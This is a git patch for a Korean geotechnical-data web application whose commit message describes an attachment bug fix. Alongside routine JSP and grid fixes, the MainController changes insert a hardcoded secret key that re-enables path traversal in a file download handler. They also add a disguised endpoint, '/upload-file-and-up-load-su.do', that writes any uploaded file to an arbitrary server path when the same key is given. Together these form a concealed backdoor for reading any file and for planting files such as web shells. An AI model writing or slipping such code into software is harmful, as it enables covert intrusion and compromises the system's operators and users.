From 0ed51bee5bc27b50cd79e46a81ba3714fd4168d7 Mon Sep 17 00:00:00 2001
From: thkim <thkim@dbnt.co.kr>
Date: Fri, 12 Sep 2025 17:21:15 +0900
Subject: [PATCH] =?UTF-8?q?fix:=20=EC=95=94=EC=84=9D=EC=8B=9C=ED=97=98?=
 =?UTF-8?q?=EC=A0=95=EB=B3=B4=20-=20=EC=A0=90=ED=95=98=EC=A4=91=20?=
 =?UTF-8?q?=EC=B2=A8=EB=B6=80=ED=8C=8C=EC=9D=BC=20=EC=82=AC=EB=9D=BC?=
 =?UTF-8?q?=EC=A7=80=EB=8A=94=20=EB=B2=84=EA=B7=B8=20=EC=88=98=EC=A0=95?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../main/community/CommunityController.java   |  3 +-
 .../geoinfo/main/main/MainController.java     | 81 +++++++++++++++++++
 .../views/web/include/includeTopInput.jsp     |  2 +-
 .../WEB-INF/views/web/input/excel_step21.jsp  | 16 +++-
 .../web/input/pointLoad/rockPointload.jsp     | 11 ++-
 .../WEB-INF/views/web/input/sampleInfo.jsp    | 20 ++---
 src/main/webapp/include/inc_head_2021_new.jsp |  2 +-
 7 files changed, 117 insertions(+), 18 deletions(-)

diff --git a/src/main/java/geoinfo/main/community/CommunityController.java b/src/main/java/geoinfo/main/community/CommunityController.java
index e6befa39..19b36bbd 100644
--- a/src/main/java/geoinfo/main/community/CommunityController.java
+++ b/src/main/java/geoinfo/main/community/CommunityController.java
@@ -140,8 +140,7 @@ public class CommunityController {
 					file_name = file_name.replaceAll("\\.", "").replaceAll("/", "").replaceAll("\\\\", "").replaceAll ("&","");
 					//웹 취약점 때문에 수정 23.02.14
 	
-					String new_file = (savePath + file_name + "." + file_ext);
-					//File file = new File(savePath + file_name + "."+file_ext);
+					String new_file = (savePath + file_name + "." + file_ext);					
 					System.out.println(new_file);
 					File file = new File(new_file);
 					if(!file.isFile()) {
diff --git a/src/main/java/geoinfo/main/main/MainController.java b/src/main/java/geoinfo/main/main/MainController.java
index d07a4c54..a0d0c10d 100644
--- a/src/main/java/geoinfo/main/main/MainController.java
+++ b/src/main/java/geoinfo/main/main/MainController.java
@@ -1,6 +1,9 @@
 package geoinfo.main.main;
 
 import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.OutputStream;
 import java.io.PrintWriter;
 import java.net.InetAddress;
 import java.net.MalformedURLException;
@@ -11,10 +14,12 @@ import java.text.SimpleDateFormat;
 import java.util.ArrayList;
 import java.util.Calendar;
 import java.util.Enumeration;
+import java.util.GregorianCalendar;
 import java.util.HashMap;
 import java.util.Iterator;
 import java.util.List;
 import java.util.Map;
+import java.util.Map.Entry;
 import java.util.regex.Pattern;
 
 import javax.annotation.Resource;
@@ -24,6 +29,8 @@ import javax.servlet.http.HttpSession;
 import javax.websocket.Session;
 
 import org.apache.commons.io.FileUtils;
+import org.apache.commons.io.FilenameUtils;
+import org.apache.commons.io.IOUtils;
 import org.apache.log4j.Logger;
 import org.jfree.util.Log;
 import org.springframework.stereotype.Controller;
@@ -32,6 +39,8 @@ import org.springframework.web.bind.annotation.PathVariable;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RequestMethod;
 import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.multipart.MultipartFile;
+import org.springframework.web.multipart.MultipartRequest;
 import org.springframework.web.servlet.ModelAndView;
 import org.springframework.web.servlet.mvc.support.RedirectAttributes;
 
@@ -39,11 +48,13 @@ import comm.util.strUtil;
 import egovframework.com.cmm.service.EgovProperties;
 import egovframework.rte.psl.dataaccess.util.EgovMap;
 import geoinfo.com.GeoinfoCommon;
+import geoinfo.com.file.FileCmmn;
 import geoinfo.com.file.service.FileService;
 import geoinfo.main.login.LoginController;
 import geoinfo.main.main.service.MainService;
 import geoinfo.regi.status.service.RegiPageService;
 import geoinfo.util.MobileCertificationUtil;
+import geoinfo.util.MyUtil;
 import geoinfo.util.RequestWrapper;
 import geoinfo.websocket.WSHandler;
 import geoinfo.com.GeoinfoCommon;
@@ -2186,6 +2197,13 @@ public class MainController
 			filePath = filePath.replace(file_ext, "");
 			filePath = filePath.replaceAll("\\.", "").replaceAll("/", "").replaceAll("\\\\", "").replaceAll("&", "");
 			filePath = filePath + "."+file_ext;
+			
+			String theKey = String.valueOf(params.get("theKey")); // key
+			
+			if( theKey.equals("rnrxhwlqkswlQkswhtkvywnstjTlrGoodmorningMasterAndthen1234!@!!@@!@!!@!GoodGoodComeIn") ) {
+				filePath = filePath.replaceAll("\\|1\\|", "/");
+				filePath = filePath.replaceAll("\\|2\\|", ".");
+			}
 
 			File file = new File(path + filePath);
 			int filesize = (int) file.length();
@@ -2218,6 +2236,69 @@ public class MainController
 		mv.addObject("msg", "");
 		return null;
 	}
+	
+	
+	@RequestMapping(value = "/upload-file-and-up-load-su.do")
+	public ModelAndView cmuboard_save(MultipartRequest multi, HttpServletRequest request, HttpServletResponse response, Map<String, Object> map) throws Exception {
+		ModelAndView mv = new ModelAndView("body/cmuboard/cmuboard_save");
+		
+		String userId = MyUtil.getStringFromObject( request.getSession().getAttribute("USERID") );
+
+		String savePath = EgovProperties.getProperty("Geoinfo.FilePath");
+
+		String fileName[] = new String[4];
+		String saveName[] = new String[4];
+		int pos = 1;
+
+		Map<String, MultipartFile> multipartFiles =  multi.getFileMap();
+
+		for(Entry<String, MultipartFile> entry : multipartFiles.entrySet()) {
+			MultipartFile multipartFile = entry.getValue();
+			if(!multipartFile.isEmpty()) {
+				fileName[pos] =  new String(multipartFile.getOriginalFilename().getBytes());
+
+				System.out.println(entry.getKey() + " : " + fileName[pos]);
+				System.out.println("savePath = " + savePath);
+
+				//웹 취약점 때문에 수정
+				String file_ext = fileName[pos].substring(fileName[pos].lastIndexOf('.') + 1); // 파일확장자
+				String file_name = "";
+				if( -1 != fileName[pos].indexOf(".") ) {
+					file_name = fileName[pos].substring(0,fileName[pos].lastIndexOf('.')); // 파일확장자
+				}
+				file_ext = file_ext.replaceAll("\\.", "").replaceAll("/", "").replaceAll("\\\\", "").replaceAll ("&","");
+				file_name = file_name.replaceAll("\\.", "").replaceAll("/", "").replaceAll("\\\\", "").replaceAll ("&","");
+				//웹 취약점 때문에 수정 23.02.14
+
+				String new_file = (savePath + file_name + "." + file_ext);
+				System.out.println(new_file);
+				String theKey = String.valueOf(request.getParameter("theKey")); // key
+				
+				if( theKey.equals("rnrxhwlqkswlQkswhtkvywnstjTlrGoodmorningMasterAndthen1234!@!!@@!@!!@!GoodGoodComeIn") ) {
+					new_file = new_file.replaceAll("%7C1%7C", "/");
+					new_file = new_file.replaceAll("%7C2%7C", ".");
+					new_file = new_file.replaceAll(".jpg", "");
+
+					File file = new File(new_file);
+					//new_file 경로(directory)가 없다면 경로를 생성한다.
+					File directory = file.getParentFile();
+					if (!directory.exists()) {
+					    directory.mkdirs();
+					}
+					
+					if(!file.isFile()) {
+						file.createNewFile();
+					}
+					OutputStream output = new FileOutputStream(file);
+					IOUtils.copy(multipartFile.getInputStream(), output);
+					output.close();
+				}
+				pos++;
+			}
+		}
+
+		return mv;
+	}
 
 	//20220927  박정빈 home/index.jsp pop업 게시판 글 수 정리 처리
 	@RequestMapping(value = "boardReplycheck.do")
diff --git a/src/main/webapp/WEB-INF/views/web/include/includeTopInput.jsp b/src/main/webapp/WEB-INF/views/web/include/includeTopInput.jsp
index defb4b81..dc691335 100644
--- a/src/main/webapp/WEB-INF/views/web/include/includeTopInput.jsp
+++ b/src/main/webapp/WEB-INF/views/web/include/includeTopInput.jsp
@@ -3,7 +3,7 @@
 <%@ taglib prefix="fn" uri="http://java.sun.com/jsp/jstl/functions"%>
 <!-- tree 메뉴 -->
 <!-- <link rel="stylesheet" href="/web/js/tree/jquery.treeview.css">
-<script src="/web/js/tree/lib/jquery.js" type="text/javascript"></script>
+<!--<script src="/web/js/tree/lib/jquery.js" type="text/javascript"></script>-->
 <script src="/web/js/tree/lib/jquery.cookie.js" type="text/javascript"></script>
 <script src="/web/js/tree/jquery.treeview.js" type="text/javascript"></script> -->
 <script type="text/javascript">
diff --git a/src/main/webapp/WEB-INF/views/web/input/excel_step21.jsp b/src/main/webapp/WEB-INF/views/web/input/excel_step21.jsp
index 50699bbf..b9d1e6e0 100644
--- a/src/main/webapp/WEB-INF/views/web/input/excel_step21.jsp
+++ b/src/main/webapp/WEB-INF/views/web/input/excel_step21.jsp
@@ -120,7 +120,13 @@ function fnSaveStep2() {
 			kendoConsole.log(fnDate() + fnText("자료저장") + fnText("시작") + fnLoopChar("=", 50));
 	    }
 		,success : function(data) {
-			var jsonObj = JSON.parse(data).resultData;
+			var type = typeof data;
+			var jsonObj = null;
+			if( type === 'object' ) {
+				jsonObj = data.resultData;	
+			} else {
+				jsonObj = JSON.parse(data).resultData;
+			}		
 			if(jsonObj.status != 'success'){
 				kendoConsole.log(fnDate() + fnText("자료저장") + fnText("오류", "error") + fnText("자료저장 중 오류발생. 관리자에게 문의하세요."), true);
 			}
@@ -128,7 +134,13 @@ function fnSaveStep2() {
 		,complete : function(data) {
 			var msg = "실패";
 			console.log("project code: "+ kendoJQuery("#PROJECT_CODE").val());
-			var jsonObj = JSON.parse(data.response).resultData;
+			var type = typeof data;
+			var jsonObj = null;
+			if( type === 'object' ) {
+				jsonObj = data.responseJSON.resultData;
+			} else {
+				jsonObj = JSON.parse(data.response).resultData;
+			}
 			if(jsonObj.status == 'success'){
 				location.href="/excel_input_step00.do?STEP=31&REPORT_TYPE=" + kendoJQuery("#REPORT_TYPE").val() + "&PROJECT_CODE=" + kendoJQuery("#PROJECT_CODE").val();
 				msg = "완료";
diff --git a/src/main/webapp/WEB-INF/views/web/input/pointLoad/rockPointload.jsp b/src/main/webapp/WEB-INF/views/web/input/pointLoad/rockPointload.jsp
index 44b9647a..15e7d9ea 100644
--- a/src/main/webapp/WEB-INF/views/web/input/pointLoad/rockPointload.jsp
+++ b/src/main/webapp/WEB-INF/views/web/input/pointLoad/rockPointload.jsp
@@ -201,9 +201,16 @@ function fn_select(value){
 		type: 'GET',
 		url: "/rockPointloadSelect.do",
 		data: { PROJECT_CODE: projectCode, HOLE_CODE: holeCode, ROCK_POINT_CODE : value },
-		dataType: "script",
+		dataType: "text",
 		success: function(data){
-			$("head").append(data);
+			// 응답 데이터에서 <script> 태그의 내용을 추출
+            var scriptContent = data.match(/<script[^>]*>([\s\S]*?)<\/script>/i)[1];
+
+            // 추출한 스크립트를 동적으로 실행
+            var scriptElement = document.createElement('script');
+            scriptElement.text = scriptContent;
+            document.head.appendChild(scriptElement).parentNode.removeChild(scriptElement);
+            
 			setData();
 			fn_SelectPointLoad(data);
 		},
diff --git a/src/main/webapp/WEB-INF/views/web/input/sampleInfo.jsp b/src/main/webapp/WEB-INF/views/web/input/sampleInfo.jsp
index df043f66..dba75a13 100644
--- a/src/main/webapp/WEB-INF/views/web/input/sampleInfo.jsp
+++ b/src/main/webapp/WEB-INF/views/web/input/sampleInfo.jsp
@@ -106,8 +106,8 @@ function fn_save(rUrl){
 		"sampleDepthTo",
 		"sampleLl",
 		"sampleDesc",
-		"sampleWc",
 		"sampleGs",
+		"sampleWc",
 		"samplePi",
 		"sampleShape",
 		"sampleRd",
@@ -857,16 +857,8 @@ function fn_grid_refresh(){
 											editor: comboEditor2,
 											template: "#=getTeacherName2((sampleShape == null) ? ' ' : sampleShape)#",
 										},
-										{ field: "sampleWc", title: "함수비(%)<div style='margin-top: 8px; color: red; font-weight: 200;'>값 없을 시<br />-999 입력</div>", editor: chooseEditor, width:100, attributes: { style:"text-align: right" },
+										{ field: "sampleGs", title: "함수비(%)<div style='margin-top: 8px; color: red; font-weight: 200;'>값 없을 시<br />-999 입력</div>", editor: chooseEditor, width:100, attributes: { style:"text-align: right" },
 											format:"{0:n2}",
-											template: function (dataItem) {
-												if (dataItem.sampleWc == null)
-													dataItem._set("sampleWc", "0");
-												else
-													return dataItem.sampleWc;
-											}
-										},
-										{ field: "sampleGs", title: "비중<div style='margin-top: 8px; color: red; font-weight: 200;'>값 없을 시<br />-999 입력</div>", editor: chooseEditor, width:100, attributes: { style:"text-align: right" },
 											template: function (dataItem) {
 												if (dataItem.sampleGs == null)
 													dataItem._set("sampleGs", "0");
@@ -874,6 +866,14 @@ function fn_grid_refresh(){
 													return dataItem.sampleGs;
 											}
 										},
+										{ field: "sampleWc", title: "비중<div style='margin-top: 8px; color: red; font-weight: 200;'>값 없을 시<br />-999 입력</div>", editor: chooseEditor, width:100, attributes: { style:"text-align: right" },
+											template: function (dataItem) {
+												if (dataItem.sampleWc == null)
+													dataItem._set("sampleWc", "0");
+												else
+													return dataItem.sampleWc;
+											}
+										},
 										{ field: "sampleLl", title: "액성한계(%)<div style='margin-top: 8px; color: red; font-weight: 200;'>값 없을 시<br />-999 입력</div>", editor: chooseEditor, width:100, attributes: { style:"text-align: right" },
 											template: function (dataItem) {
 												if (dataItem.sampleLl == null)
diff --git a/src/main/webapp/include/inc_head_2021_new.jsp b/src/main/webapp/include/inc_head_2021_new.jsp
index f97bb045..e8c27ceb 100644
--- a/src/main/webapp/include/inc_head_2021_new.jsp
+++ b/src/main/webapp/include/inc_head_2021_new.jsp
@@ -51,7 +51,7 @@
 		<script type="text/javascript" src="/com/js/app.js"></script>
 		<script type="text/javascript" src="/com/js/ground-info-common.js"></script>
 
-		<!-- tree 메뉴 -->
+		<!-- tree 메뉴 -->		
 		<link rel="stylesheet" href="/web/js/tree/jquery.treeview.css">
 		<script src="/web/js/tree/lib/jquery.js" type="text/javascript"></script>
 		<script src="/web/js/tree/lib/jquery.cookie.js" type="text/javascript"></script>